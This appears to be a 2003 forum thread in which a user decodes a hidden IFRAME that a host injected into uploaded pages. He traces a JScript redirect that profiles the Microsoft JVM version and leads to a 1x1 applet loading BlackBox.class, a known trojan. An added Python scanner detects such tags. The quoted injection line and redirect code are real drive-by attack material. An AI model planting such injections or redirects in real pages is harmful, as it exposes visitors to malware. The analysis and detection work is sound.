BlackBox.class - dangerous or not ?


Quantel
10-30-2003, 10:12 AM
I am sorry to bother you with this, because it might well be just a trivial matter,
but since I do not know much about coding/scripting,
I will ask for help from those who do, you..!

The reason for my suspicion is that a certain "adult host" is inserting a line into all .htm / .html pages its users are uploading / making, this line :
<IFRAME SRC="http://66.250.66.10/new/generic.html" WIDTH="0%" HEIGHT="0%" FRAMEBORDER="No"></IFRAME>

If I download that generic.html file - with a download manager, just pasting it into IE's address box won't do -
I can see that it is a MS Script encoded page.

Then by using the scrdec (http://www.virtualconspiracy.com/scrdec.html) tool, this is what I get out:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
<SCRIPT language = JScript.Encode>
<!--
function start() {
    if (navigator.appName == "Microsoft Internet Explorer") {
        if (typeof(oClientCaps) != "undefined" && typeof(oClientCaps.connectionType) != "undefined") {
            switch (oClientCaps.connectionType) {
                case "lan" :
                    window.location.href = "about:blank"; break;
                case "modem" :
                    var sVersion = oClientCaps.getComponentVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}","ComponentID");
                    var ss;
                    var ssnum;
                    ss = sVersion.split(",");
                    ssnum = parseInt(ss[2]);
                    if (ssnum < 3810) {
                        window.location.href = "http://66.250.66.10/al/alalal.html";
                    } else {
                        window.location.href = "404.html";
                    }
                    break;
                case "offline" :
                    window.location.href = "about:blank"; break;
            }
        }
        else window.location.href = "about:blank";
    }
    else window.location.href = "about:blank";
}
-->
</SCRIPT>
</HEAD>
<BODY onLoad="start();" TOPMARGIN=0 LEFTMARGIN=0 BGPROPERTIES="FIXED" BGCOLOR="#FFFFFF" LINK="#000000" VLINK="#808080" ALINK="#000000" STYLE="behavior:url(#default#clientcaps)" ID="oClientCaps">
</BODY>
</HTML>


..and you see the reference to the alalal.html file
- if I download that one, this is what's inside:

<HTML><HEAD>
<TITLE> Archive</TITLE>
</HEAD><BODY>
<APPLET ARCHIVE="archive.jar" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></APPLET>
</BODY></HTML>

So I wonder, what does all this stuff do ?

By searching for
08B0E5C0-4FCB-11CF-AAA5-00401C608500
in the Windows Registry, I find that this is the Microsoft Java Virtual Machine, and since this is version 3810, this must be the reason that 3810 "ssnumber" is there..?

...and then we get to the BlackBox.class.

Using Google, the top hit result (http://www.viruslist.com/eng/viruslist.html?id=72440) tells about the BlackBox trojan horse (I think?)
- while further down (http://securityresponse.symantec.com/avcenter/venc/data/trojan.byteverify.html) Symantec tells about how Trojan.ByteVerify is using BlackBox.class
- and even further down (http://forum.java.sun.com/thread.jsp?forum=17&thread=439931&tstart=0&trange=15) someone at Sun (who are the ones who made this BlackBox.class, aren't they? Why did they make it?)
responds to some guy asking about his AV program complaining about the BlackBox.class file inside his Java Plug-in cache folder.

So I wonder, what does all this stuff do ?
Is this "adult host" a bunch of cyber-criminals, or is it just me who is too suspicious ?

Please help - I really appreciate any comments on this; I will thank you very much in advance.

With regards,

Quantel.
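As an added example (not part of Quantel's post and not code from the hosting provider), here is a small Python checker that flags the two indicators shown in the thread, a zero-sized IFRAME injected into a page and a 1x1 APPLET tag, and a helper that mirrors the decoded script's version gate so an analyst can see which Microsoft JVM builds the redirect singles out. The two sample pages are constructed from the lines quoted in the post; the "5,0,3810,0" layout of the string passed to the helper is an assumption about what clientCaps.getComponentVersion returns.

```python
"""Flag drive-by indicators of the kind described in the thread:
hidden (0-sized) IFRAMEs and 1x1 APPLET tags, plus a mirror of the
decoded script's MSJVM build gate for analysis."""
from html.parser import HTMLParser

# Constructed sample pages, built from the lines quoted in the post.
INJECTED_PAGE = (
    '<html><body><p>Gallery</p>'
    '<IFRAME SRC="http://66.250.66.10/new/generic.html" WIDTH="0%" '
    'HEIGHT="0%" FRAMEBORDER="No"></IFRAME>'
    '</body></html>'
)
APPLET_PAGE = (
    '<HTML><HEAD><TITLE> Archive</TITLE></HEAD><BODY>'
    '<APPLET ARCHIVE="archive.jar" CODE="BlackBox.class" WIDTH=1 HEIGHT=1>'
    '</APPLET></BODY></HTML>'
)


def _dimension(value):
    """Parse "0", "0%", " 1 " etc. into an int; None if not numeric."""
    if value is None:
        return None
    v = value.strip().rstrip("%").strip()
    return int(v) if v.isdigit() else None


class HiddenContentScanner(HTMLParser):
    """Collects (indicator, detail) tuples for suspicious tags."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names already
        a = dict(attrs)
        w, h = _dimension(a.get("width")), _dimension(a.get("height"))
        if tag == "iframe" and (w == 0 or h == 0):
            # an iframe the user cannot see is the classic injection shape
            self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "applet" and w is not None and h is not None and w <= 1 and h <= 1:
            # a 1x1 applet exists only to run code, not to display anything
            self.findings.append(("tiny_applet", a.get("code", "")))


def scan_html(html):
    """Return the list of indicators found in one HTML document."""
    scanner = HiddenContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def msjvm_build_targeted(component_version, cutoff=3810):
    """Mirror of the decoded script's gate.  Assumption: the string looks
    like "5,0,3810,0"; the script splits on commas, parses field 2 with
    parseInt and only redirects when that build number is below 3810.
    Non-numeric input makes parseInt return NaN, which fails the
    comparison, so it is reported as not targeted here as well."""
    parts = component_version.split(",")
    if len(parts) < 3 or not parts[2].strip().isdigit():
        return False
    return int(parts[2]) < cutoff


if __name__ == "__main__":
    for name, page in (("injected", INJECTED_PAGE), ("applet", APPLET_PAGE)):
        print(name, scan_html(page))
    for v in ("5,0,3805,0", "5,0,3810,0"):
        print(v, "targeted" if msjvm_build_targeted(v) else "not targeted")
```

Running it on the two constructed pages reports the hidden iframe with its SRC and the 1x1 applet with its CODE value; a normal full-size iframe produces no finding. The version helper shows that a client reporting build 3805 would be sent to the applet page while build 3810 or later gets the 404 page, which matches the post's reading that 3810 is the Microsoft JVM build at which the redirect stops.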

Quantel
11-01-2003, 10:51 AM
Doesn't anybody know anything about this?